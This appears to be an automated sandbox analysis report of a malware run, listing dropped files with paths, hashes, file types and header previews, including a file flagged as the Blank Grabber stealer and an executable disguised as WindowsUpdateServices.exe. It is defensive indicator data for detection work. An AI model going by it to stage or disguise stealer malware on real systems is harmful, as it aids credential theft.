                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\python312.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1806616
                                                                                                                                                                                                                                Entropy (8bit):7.993924698335258
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:xm7u77uID/cZXnJ4Ph3tLm82R8PeDCemJ:Y7uJcZX6pumfJ
                                                                                                                                                                                                                                MD5:FB8BEDF8440EB432C9F3587B8114ABC0
                                                                                                                                                                                                                                SHA1:136BB4DD38A7F6CB3E2613910607131C97674F7C
                                                                                                                                                                                                                                SHA-256:CB627A3C89DE8E114C95BDA70E9E75C73310EB8AF6CF3A937B1E3678C8F525B6
                                                                                                                                                                                                                                SHA-512:B632235D5F60370EFA23F8C50170A8AC569BA3705EC3D515EFCAD14009E0641649AB0F2139F06868024D929DEFFFFFEFB352BD2516E8CD084E11557B31E95A63
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ._.A...A...A.......A.......A.......A.......A.......A...9e..A...9...A...A...@......cA.......A.......A.......A..Rich.A..........PE..d...cK.f.........." ...&..........P..ak...P..................................Pl...........`.........................................H.k.d....yk......pk......._.TI...........Ll. ...........................0mk.(...pmk.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........pk.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\rar.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):630736
                                                                                                                                                                                                                                Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\rarreg.key

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):456
                                                                                                                                                                                                                                Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI43482\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\select.pyd

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26392
                                                                                                                                                                                                                                Entropy (8bit):7.4349429154342905
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:GW9SNyB153wXwCp5DlIjQGO/5YiSyv38aAMxkE7:4a3aDlIjQGOx7Sy/8Yxn
                                                                                                                                                                                                                                MD5:08B4CAEACCB6F6D27250E6A268C723BE
                                                                                                                                                                                                                                SHA1:575C11F72C8D0A025C307CB12EFA5CB06705561D
                                                                                                                                                                                                                                SHA-256:BD853435608486555091146AB34B71A9247F4AAA9F7ECFBC3B728A3E3EFDE436
                                                                                                                                                                                                                                SHA-512:9B525395DEC028EF3286C75B88F768E5D40195D4D5ADAB0775C64B623345D81DA1566596CC61A460681BC0ADBA9727AFC96C98AD2E54FF371919F3DB6D369B0C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d....K.f.........." ...&.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\sqlite3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):660248
                                                                                                                                                                                                                                Entropy (8bit):7.993344862024604
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:12288:QTdlyELYyNiFVhF+v4GTHxoyMnYllAuz1eRDRA8z7B/oe7zMdxsp2gB:QTdlyK5oFVDQ4GGYsaejd1/oeTp2gB
                                                                                                                                                                                                                                MD5:482B3F8ADF64F96AD4C81AE3E7C0FB35
                                                                                                                                                                                                                                SHA1:91891D0EABB33211970608F07850720BD8C44734
                                                                                                                                                                                                                                SHA-256:1FBDB4020352E18748434EF6F86B7346F48D6FB9A72C853BE7B05E0E53EBBB03
                                                                                                                                                                                                                                SHA-512:5DE56E00AB6F48FFC836471421D4E360D913A78EE8E071896A2CD951FF20F7A4123ABD98ADF003CE166DCC82AAD248EBF8B63E55E14ECEEC8AA9A030067C0D1D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d....K.f.........." ...&.....0...........................................................`..............................................#......................h......................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\ucrtbase.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1016584
                                                                                                                                                                                                                                Entropy (8bit):6.669319438805479
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                                                                                                MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                                                                                                SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                                                                                                SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                                                                                                SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\unicodedata.pyd

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):302360
                                                                                                                                                                                                                                Entropy (8bit):7.986911403608574
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:CI6xDUAPCa+tr3XyOu6sNq64AnCK+V3evv7J7usiUZonaJnZ54QZ:CDLB+tryJ6sI647m7Fu4oM4QZ
                                                                                                                                                                                                                                MD5:27B3AF74DDAF9BCA239BF2503BF7E45B
                                                                                                                                                                                                                                SHA1:80A09257F9A4212E2765D492366ED1E60D409E04
                                                                                                                                                                                                                                SHA-256:584C2ECEA23DFC72AB793B3FD1059B3EA6FDF885291A3C7A166157CF0E6491C4
                                                                                                                                                                                                                                SHA-512:329C3A9159EA2FDCE5E7A28070BCF9D6D67ECA0B27C4564E5250E7A407C8B551B68A034BFDE9D8D688FA5A1AE6E29E132497B3A630796A97B464762CA0D81BB7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d....K.f.........." ...&.`.......0.......@................................................`.............................................X....................@.........................................................@...........................................UPX0.....0..............................UPX1.....`...@...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ti4xfhr.tfi.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lc0ztjc.pv4.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3mxvrsb.0ue.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gawkne3e.wgy.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iq25ajr2.d43.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kazcg530.wkn.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvblsxe2.5hm.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5tn0zvq.ain.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmoize0f.4jv.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvshi5r0.aav.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yiximf2g.dac.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsnoiawm.nxz.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):494592
                                                                                                                                                                                                                                Entropy (8bit):6.59991321032667
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:6XIktXfM8Lv86r9uVWAa2je4Z5zl4hgDHQQs4NTQjoHFsAOZZDAXYcN45Gv:6X7tPMK8ctGe4Dzl4h2QnuPs/ZDdcv
                                                                                                                                                                                                                                MD5:E5C79A33139A13DAAC52DA8DD0ABFC68
